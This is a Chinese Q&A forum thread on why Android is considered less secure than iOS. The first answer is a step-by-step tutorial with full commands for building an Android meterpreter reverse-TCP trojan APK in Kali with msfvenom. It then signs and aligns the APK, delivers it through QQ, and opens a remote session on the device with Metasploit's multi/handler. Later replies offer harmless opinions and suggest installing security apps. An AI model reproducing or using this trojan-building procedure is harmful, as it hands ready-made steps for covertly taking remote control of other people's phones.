咔擦娱乐
众所周知,手机操作系统的两大巨头:安卓和苹果。而安卓由于是开源系统,流畅性和安全性成为使用者口中经常吐槽的话题,流畅性从使用中我们可以得到验证。那么为什么说安全性也比苹果系统略胜一筹呢,怎么才能看得出呢?现在小编就带大家去验证一下安卓手机的安全性问题。
老规矩,还是利用kali系统下集成的metasploit工具生成一个木马
1、打开kali,输入命令【msfvenom -p android/meterpreter/reverse_tcp LHOST= “kali系统的IP”LPORT= “端口可自由设置,但不要设为已经固定的端口号” R > aaa.apk】。由安卓手机的安卓包都是以apk结尾的,所以要生成apk结尾的文件。
如果出现下图的信息,就表示木马文件已经生成,可以从根目录下找到aaa.apk文件。
接着,需要创建木马文件的证书和数字签名,由于小编也没有研究过安卓开发,只是知道安卓软件安装的时候需要用到这两个东西,所以不能为题主和各位读者解释了,请见谅。
2、通过【keytool -genkey -v -keystore apk-trojan-key.keystore -alias aaa -keyalg RSA -keysize 1024 -validity 999】命令,创建一个证书。
然后进行相关信息的配置,确认证书信息。
3、【jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore aaa.apk aaa】,创建数字签名。
为了保证木马能够在大多数安卓手机安装运行,需要对木马文件进行优化
4、先安装zipalign工具,安装的命令是【apt-get install zipalign】。
接着就可以对木马文件进行优化了,命令是【zipalign -v 4 aaa.apk aaaa.apk】,如果出现报错信息可以忽略。
5、打开安卓系统虚拟机,小编利用QQ把木马文件传到了虚拟机,暂时先不安装。
6、使用【use exploit/multi/handler】加载攻击模块,【set payload android/meterpreter/reverse_tcp】选择使用的payload模块
然后在安卓虚拟机安装木马文件,并运行。
7、返回kali系统,执行攻击命令【exploit】,就会发现返回木马已经被执行了,证明已经获取了安卓虚拟机权限,此时命令行会自动进入meterperter命令,输了【help】命令可以查看安卓系统的操作指令。至此就完成了入侵安卓系统的基本操作了!
通过这个测试我们可以知道安卓系统由于对APP的审核不严格,导致大量非法的APP可以在手机上安装并运行,造成手机卡顿,中毒等情况。相比之下,苹果系统的审核力度是非常大的,想要在苹果手机安装的APP必须通过严格的审查并限制,所以苹果手机在安全性方面的确比安卓手机更胜一筹。当然这只是小编的一点了解和想法,不能解释的面面俱到,欢迎读者在评论区留言,我们一起讨论学习!
关注小编,我将定期为大家解答各类网络安全的疑惑,并且为大家带来网络安全的实用技术。大家如果对网络安全方面的问题也可以向小编提问,如果我知道的都会为大家竭力解答!需要安卓系统虚拟机安装包的也可以私信小编"安卓虚拟机",我可以给大家提供。
深度安全
说不安全,那是要看跟谁做比较,对吧!也是相对而言,并不是绝对的! 相对苹果封闭的系统,肯定会说不安全,但也只是相对而言。
而且,现在安卓各大厂商自带的管家软件已经很强大了,至少我没听说过谁的安卓手机被侵略了,出啥安全问题!反而,我听到了很多关于苹果的负面报道,比如什么系统被破解盗刷财产等等.....
所以,不必纠结这个问题,你觉得好用就行了!
狂奔的月光
它的系统是开源的,并不是像苹果系统闭源的,手机发烧友可以发挥体验手机,可以随意的刷机,只要手机不坏,所以安卓会定期更新安全补丁。
飞亦F
因为它的系统开放程度比较高,好玩但是漏洞也大,建议你可以在手机上安装可靠的第三方安全防护软件,诸如360手机卫士或者腾讯手机管家这样的,增强手机系统安全能力。
给个优质回答谢谢
